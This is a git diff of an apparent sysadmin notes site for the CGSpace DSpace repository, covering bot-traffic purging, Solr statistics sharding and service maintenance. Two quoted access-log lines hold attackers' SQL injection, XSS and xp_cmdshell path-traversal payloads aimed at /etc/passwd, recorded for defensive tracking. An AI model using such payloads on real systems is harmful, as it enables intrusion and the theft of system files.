                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 4358.713 ms (00:04.359)
                                                                                                                                                                                                                                                                                                                                +Time: 4301.248 ms (00:04.301)
                                                                                                                                                                                                                                                                                                                                +Time: 4417.909 ms (00:04.418)
                                                                                                                                                                                                                                                                                                                                +
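The `SIMILARITY()` call in the query above comes from PostgreSQL's `pg_trgm` extension, which compares the sets of three-character sequences in two strings. A minimal Python sketch of that idea follows. It only approximates the extension's behaviour (lowercasing, splitting on non-alphanumerics, padding each word with two leading spaces and one trailing space), and the function names are hypothetical, not part of PostgreSQL or DSpace.

```python
import re


def trigrams(text: str) -> set[str]:
    """Build a trigram set roughly the way pg_trgm does (approximation)."""
    grams: set[str] = set()
    # Lowercase and split on anything that is not a letter or digit.
    for word in re.findall(r"[^\W_]+", text.lower()):
        # Each word is padded with two spaces in front and one behind.
        padded = f"  {word} "
        for i in range(len(padded) - 2):
            grams.add(padded[i:i + 3])
    return grams


def similarity(a: str, b: str) -> float:
    """Shared trigrams divided by all distinct trigrams (Jaccard index)."""
    ta, tb = trigrams(a), trigrams(b)
    if not ta or not tb:
        return 0.0
    return len(ta & tb) / len(ta | tb)


if __name__ == "__main__":
    title = ("Traditional knowledge affects soil management ability "
             "of smallholder farmers in marginal areas")
    print(similarity(title, title))
    print(similarity(title, "Traditional knowledge and soil management"))
```

An exact duplicate title scores 1.0, so the `> 0.6` threshold in the query only returns titles that share most of their trigrams with the search string.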

                                                                                                                                                                                                                                                                                                                                2021-10-13

                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                $ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "booo" -W "(sAMAccountName=fuuu)"
                                                                                                                                                                                                                                                                                                                                -Enter LDAP Password:
                                                                                                                                                                                                                                                                                                                                -ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                -        additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "booo" -W "(sAMAccountName=fuuu)"
                                                                                                                                                                                                                                                                                                                                  +Enter LDAP Password:
                                                                                                                                                                                                                                                                                                                                  +ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                  +        additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  • I sent a message to ILRI ICT to ask them to check the account
                                                                                                                                                                                                                                                                                                                                    • They reset the password so I ran all system updates and rebooted the server since users weren’t able to log in anyways
                                                                                                                                                                                                                                                                                                                                    • @@ -664,17 +664,17 @@ ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ http 'localhost:8081/solr/statistics/select?q=time%3A2021-04*&fl=ip&wt=json&indent=true&facet=true&facet.field=ip&facet.limit=200000&facet.mincount=1' > /tmp/2021-04-ips.json
                                                                                                                                                                                                                                                                                                                                  -# Ghetto way to extract the IPs using jq, but I can't figure out how only print them and not the facet counts, so I just use sed
                                                                                                                                                                                                                                                                                                                                  -$ jq '.facet_counts.facet_fields.ip[]' /tmp/2021-04-ips.json | grep -E '^"' | sed -e 's/"//g' > /tmp/ips.txt
                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
                                                                                                                                                                                                                                                                                                                                  -$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u > /tmp/networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                  -$ wc -l /tmp/networks-to-block.txt 
                                                                                                                                                                                                                                                                                                                                  -125 /tmp/networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                  -$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt > /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                  -$ wc -l /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                  -202
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    $ http 'localhost:8081/solr/statistics/select?q=time%3A2021-04*&fl=ip&wt=json&indent=true&facet=true&facet.field=ip&facet.limit=200000&facet.mincount=1' > /tmp/2021-04-ips.json
                                                                                                                                                                                                                                                                                                                                    +# Ghetto way to extract the IPs using jq, but I can't figure out how only print them and not the facet counts, so I just use sed
                                                                                                                                                                                                                                                                                                                                    +$ jq '.facet_counts.facet_fields.ip[]' /tmp/2021-04-ips.json | grep -E '^"' | sed -e 's/"//g' > /tmp/ips.txt
                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
                                                                                                                                                                                                                                                                                                                                    +$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u > /tmp/networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                    +$ wc -l /tmp/networks-to-block.txt 
                                                                                                                                                                                                                                                                                                                                    +125 /tmp/networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                    +$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt > /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                    +$ wc -l /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                    +202
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    • Attempting to purge those only shows about 3,500 hits, but I will do it anyways
                                                                                                                                                                                                                                                                                                                                      • Adding 64.39.108.48 from Qualys I get a total of 22631 hits purged
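The comment in the commands above mentions not knowing how to print only the IPs without the facet counts. By default Solr returns each facet field as a flat list alternating value and count, so taking every second element is enough. The sketch below shows that step plus a `grepcidr`-style filter using Python's standard `ipaddress` module. The function names and the sample addresses (from the documentation ranges) are made up for illustration and are not taken from the real statistics core.

```python
import ipaddress


def facet_values(solr_response: dict, field: str) -> list[str]:
    """Return only the facet values, skipping the interleaved counts.

    Assumes Solr's default flat layout: [value, count, value, count, ...].
    """
    flat = solr_response["facet_counts"]["facet_fields"][field]
    return flat[0::2]


def ips_in_networks(ips: list[str], networks: list[str]) -> list[str]:
    """Keep the IPs that fall inside any of the given CIDR networks."""
    nets = [ipaddress.ip_network(n, strict=False) for n in networks]
    return [
        ip for ip in ips
        if any(ipaddress.ip_address(ip) in net for net in nets)
    ]


if __name__ == "__main__":
    # Hypothetical response fragment, not real CGSpace data.
    sample = {
        "facet_counts": {
            "facet_fields": {
                "ip": ["192.0.2.10", 42, "198.51.100.7", 3, "203.0.113.5", 1]
            }
        }
    }
    ips = facet_values(sample, "ip")
    print(ips)
    print(ips_in_networks(ips, ["192.0.2.0/24", "203.0.113.0/24"]))
```

The second function stands in for `grepcidr -f networks-to-block.txt ips.txt`; in practice the network list would come from the `csvcut -c network` output.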
                                                                                                                                                                                                                                                                                                                                      • @@ -715,9 +715,9 @@ $ wc -l /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                        • Even more annoying, they are not re-using their session ID:
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                        $ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                        -4888
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          $ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                          +4888
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          • This IP has made 36,000 requests to CGSpace…
                                                                                                                                                                                                                                                                                                          • The IP is owned by Internet Vikings in Sweden
                                                                                                                                                                                                                                                                                                          • I purged their statistics and set up a temporary HTTP 403 telling them to use a real user agent
                                                                                                                                                                                                                                                                                                          • @@ -729,17 +729,17 @@ $ wc -l /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                          • I added these two IPs to the nginx IP bot identifier
                                                                                                                                                                                                                                                                                                          • Jesus I found a few Russian IPs attempting SQL injection and path traversal, ie:
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] "GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 143070 "https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11"
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] "GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 143070 "https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11"
                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                          • I reported them to AbuseIPDB.com and purged their hits:
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          $ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
                                                                                                                                                                                                                                                                                                          -Purging 6364 hits from 45.9.20.71 in statistics
                                                                                                                                                                                                                                                                                                          -Purging 8039 hits from 45.146.166.157 in statistics
                                                                                                                                                                                                                                                                                                          -Purging 3383 hits from 45.155.204.82 in statistics
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          -Total number of bot hits purged: 17786
                                                                                                                                                                                                                                                                                                          -

                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          $ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
                                                                                                                                                                                                                                                                                                          +Purging 6364 hits from 45.9.20.71 in statistics
                                                                                                                                                                                                                                                                                                          +Purging 8039 hits from 45.146.166.157 in statistics
                                                                                                                                                                                                                                                                                                          +Purging 3383 hits from 45.155.204.82 in statistics
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          +Total number of bot hits purged: 17786
                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                          2021-10-31

                                                                                                                                                                                                                                                                                                          • Update Docker containers for AReS on linode20 and run a fresh harvest
• Found some strange IP (94.71.3.44) making 51,000 requests today with the user agent “Microsoft Internet Explorer”
@@ -757,13 +757,13 @@ Purging 3383 hits from 45.155.204.82 in statistics
                                                                                                                                                                                                                                                                                                          • That’s from ASN 12552 (IPO-EU, SE), which is operated by Internet Vikings, though AbuseIPDB.com says it’s Availo Networks AB
                                                                                                                                                                                                                                                                                                          • There’s another IP (3.225.28.105) that made a few thousand requests to the REST API from Amazon, though it’s using a normal user agent
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          # zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
                                                                                                                                                                                                                                                                                                          -3991
                                                                                                                                                                                                                                                                                                          -~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE 'GET /rest/(collections|handle|items)' | sort | uniq -c
                                                                                                                                                                                                                                                                                                          -   3154 GET /rest/collections
                                                                                                                                                                                                                                                                                                          -    427 GET /rest/handle
                                                                                                                                                                                                                                                                                                          -    410 GET /rest/items
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            # zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
                                                                                                                                                                                                                                                                                                            +3991
                                                                                                                                                                                                                                                                                                            +~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE 'GET /rest/(collections|handle|items)' | sort | uniq -c
                                                                                                                                                                                                                                                                                                            +   3154 GET /rest/collections
                                                                                                                                                                                                                                                                                                            +    427 GET /rest/handle
                                                                                                                                                                                                                                                                                                            +    410 GET /rest/items
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            • It requested the CIAT Story Maps collection over 3,000 times last month…
                                                                                                                                                                                                                                                                                                              • I will purge those hits
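The log checks above can be wrapped in two small helpers. This is a minimal sketch, assuming nginx's default "combined" log format, where the client IP is the first field. The function names `top_ips` and `endpoint_counts` are hypothetical and not part of any existing script. Unlike a plain `zgrep 3.225.28.105`, the IP is compared literally against the first field, so the dots are not treated as regex wildcards.

```shell
# Sketch: rank client IPs by request count.
# Reads access log lines on stdin; assumes the client IP is the first field.
top_ips() {
    limit="${1:-10}"   # hypothetical parameter: how many IPs to print
    awk '{ print $1 }' | sort | uniq -c | sort -rn | head -n "$limit"
}

# Sketch: count the REST endpoints requested by a single IP.
# Reads access log lines on stdin; $1 is the IP to inspect.
endpoint_counts() {
    ip="$1"
    awk -v ip="$ip" '$1 == ip' \
        | grep -oE 'GET /rest/(collections|handle|items)' \
        | sort | uniq -c | sort -rn
}
```

For rotated, compressed logs this might be used as `zcat /var/log/nginx/rest.log.*.gz | top_ips 5`, followed by `zcat /var/log/nginx/rest.log.*.gz | endpoint_counts 3.225.28.105` for any address that stands out.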
diff --git a/docs/2021-11/index.html b/docs/2021-11/index.html
index 65cf5f24b..dc6e14a7a 100644
--- a/docs/2021-11/index.html
+++ b/docs/2021-11/index.html
@@ -32,7 +32,7 @@ First I exported all the 2019 stats from CGSpace:
$ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
"/>
-
+
@@ -123,16 +123,16 @@ $ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                              • I experimented with manually sharding the Solr statistics on DSpace Test
                                                                                                                                                                                                                                                                                                              • First I exported all the 2019 stats from CGSpace:
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                              $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                              -$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                +$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                $ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
                                                                                                                                                                                                                                                                                                                -# create core in Solr admin
                                                                                                                                                                                                                                                                                                                -$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2019-*</query></delete>"
                                                                                                                                                                                                                                                                                                                -$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  $ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
                                                                                                                                                                                                                                                                                                                  +# create core in Solr admin
                                                                                                                                                                                                                                                                                                                  +$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2019-*</query></delete>"
                                                                                                                                                                                                                                                                                                                  +$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  • The key thing above is that you create the core in the Solr admin UI, but the data directory must already exist so you have to do that first in the file system
                                                                                                                                                                                                                                                                                                                  • I restarted the server after the import was done to see if the cores would come back up OK
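Since the same steps are repeated for each year, the sequence can be written once as a template. This is a minimal sketch, assuming the 2019 commands above carry over unchanged to other years. The function name `shard_plan` is hypothetical, and it only prints the commands as a dry run, because the core still has to be created by hand in the Solr admin UI after the data directory exists.

```shell
# Sketch: print the per-year sharding steps for review (dry run, nothing is executed).
# $1: year to shard
# $2: Solr base URL (defaults to the one used in the notes)
# $3: Solr home directory (defaults to the DSpace Test path used in the notes)
shard_plan() {
    year="$1"
    solr="${2:-http://localhost:8081/solr}"
    solr_home="${3:-/home/dspacetest.cgiar.org/solr}"
    cat <<EOF
./run.sh -s ${solr}/statistics -f 'time:${year}-*' -a export -o statistics-${year}.json -k uid
zstd statistics-${year}.json
mkdir -p ${solr_home}/statistics-${year}/data
# manual step: create the statistics-${year} core in the Solr admin UI
curl -s "${solr}/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:${year}-*</query></delete>"
./run.sh -s ${solr}/statistics-${year} -a import -o statistics-${year}.json -k uid
EOF
}
```

Running `shard_plan 2018` prints the six steps in order, with the `mkdir` ahead of the manual core creation, so each command can be checked before it is run by hand.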
                                                                                                                                                                                                                                                                                                                      @@ -165,13 +165,13 @@ $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                  91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] "HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&isAllowed=y HTTP/1.1" 200 0 "https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf" "Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10"
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] "HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&isAllowed=y HTTP/1.1" 200 0 "https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf" "Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10"
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    • Another is in China, and they grabbed 1,200 PDFs from the REST API in under an hour:
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                    # zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
                                                                                                                                                                                                                                                                                                                    -1178
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      # zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
                                                                                                                                                                                                                                                                                                                      +1178
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      • I will continue to split the Solr statistics back into year-shards on DSpace Test (linode26)
                                                                                                                                                                                                                                                                                                                        • Today I did all 2018 stats…
@@ -183,9 +183,9 @@ $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics
                                                                                                                                                                                                                                                                                                                          • Update all Docker containers on AReS and rebuild OpenRXV:
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                          -$ docker-compose build
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                            +$ docker-compose build
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            • Then restart the server and start a fresh harvest
                                                                                                                                                                                                                                                                                                                            • Continue splitting the Solr statistics into yearly shards on DSpace Test (doing 2017, 2016, 2015, and 2014 today)
• Several users wrote to me last week to say that workflow emails haven’t been working since 2021-10-21 or so
@@ -194,33 +194,33 @@ $ docker-compose build
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          $ dspace test-email
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          -About to send test email:
                                                                                                                                                                                                                                                                                                                          - - To: fuuuu
                                                                                                                                                                                                                                                                                                                          - - Subject: DSpace test email
                                                                                                                                                                                                                                                                                                                          - - Server: smtp.office365.com
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          -Error sending email:
                                                                                                                                                                                                                                                                                                                          - - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
                                                                                                                                                                                                                                                                                                                          -)
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          -Please see the DSpace documentation for assistance.
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            $ dspace test-email
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            +About to send test email:
                                                                                                                                                                                                                                                                                                                            + - To: fuuuu
                                                                                                                                                                                                                                                                                                                            + - Subject: DSpace test email
                                                                                                                                                                                                                                                                                                                            + - Server: smtp.office365.com
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            +Error sending email:
                                                                                                                                                                                                                                                                                                                            + - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
                                                                                                                                                                                                                                                                                                                            +)
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            +Please see the DSpace documentation for assistance.
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            • I sent a message to ILRI ICT to ask them to check the account/password
                                                                                                                                                                                                                                                                                                                            • I want to do one last test of the Elasticsearch updates on OpenRXV so I got a snapshot of the latest Elasticsearch volume used on the production AReS instance:
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            # tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              # tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • Then on my local server:
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              $ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
                                                                                                                                                                                                                                                                                                                              -$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components=4
                                                                                                                                                                                                                                                                                                                              -$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod 660 {} \;
                                                                                                                                                                                                                                                                                                                              -$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod 770 {} \;
                                                                                                                                                                                                                                                                                                                              -# copy backend/data to /tmp for the repository setup/layout
                                                                                                                                                                                                                                                                                                                              -$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                $ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
                                                                                                                                                                                                                                                                                                                                +$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components=4
                                                                                                                                                                                                                                                                                                                                +$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod 660 {} \;
                                                                                                                                                                                                                                                                                                                                +$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod 770 {} \;
                                                                                                                                                                                                                                                                                                                                +# copy backend/data to /tmp for the repository setup/layout
                                                                                                                                                                                                                                                                                                                                +$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                • This seems to work: all items, stats, and repository setup/layout are OK
                                                                                                                                                                                                                                                                                                                                • I merged my Elasticsearch pull request from last month into OpenRXV
                                                                                                                                                                                                                                                                                                                                @@ -245,21 +245,21 @@ $ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/d
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            RuntimeError
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            -Unable to find installation candidates for regex (2021.11.9)
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            -at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
                                                                                                                                                                                                                                                                                                                            -     68│
                                                                                                                                                                                                                                                                                                                            -     69│             links.append(link)
                                                                                                                                                                                                                                                                                                                            -     70│
                                                                                                                                                                                                                                                                                                                            -     71│         if not links:
                                                                                                                                                                                                                                                                                                                            -  →  72│             raise RuntimeError(
                                                                                                                                                                                                                                                                                                                            -     73│                 "Unable to find installation candidates for {}".format(package)
                                                                                                                                                                                                                                                                                                                            -     74│             )
                                                                                                                                                                                                                                                                                                                            -     75│
                                                                                                                                                                                                                                                                                                                            -     76│         # Get the best link
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              RuntimeError
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              +Unable to find installation candidates for regex (2021.11.9)
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              +at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
                                                                                                                                                                                                                                                                                                                              +     68│
                                                                                                                                                                                                                                                                                                                              +     69│             links.append(link)
                                                                                                                                                                                                                                                                                                                              +     70│
                                                                                                                                                                                                                                                                                                                              +     71│         if not links:
                                                                                                                                                                                                                                                                                                                              +  →  72│             raise RuntimeError(
                                                                                                                                                                                                                                                                                                                              +     73│                 "Unable to find installation candidates for {}".format(package)
                                                                                                                                                                                                                                                                                                                              +     74│             )
                                                                                                                                                                                                                                                                                                                              +     75│
                                                                                                                                                                                                                                                                                                                              +     76│         # Get the best link
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • So that’s super annoying… I’m going to try using Pipenv again…

                                                                                                                                                                                                                                                                                                                              2021-11-10

                                                                                                                                                                                                                                                                                                                              @@ -280,16 +280,16 @@ $ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/d
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          $ docker-compose down
                                                                                                                                                                                                                                                                                                                          -$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
                                                                                                                                                                                                                                                                                                                          -$ cp -a backend/data backend/data.2021-11-14
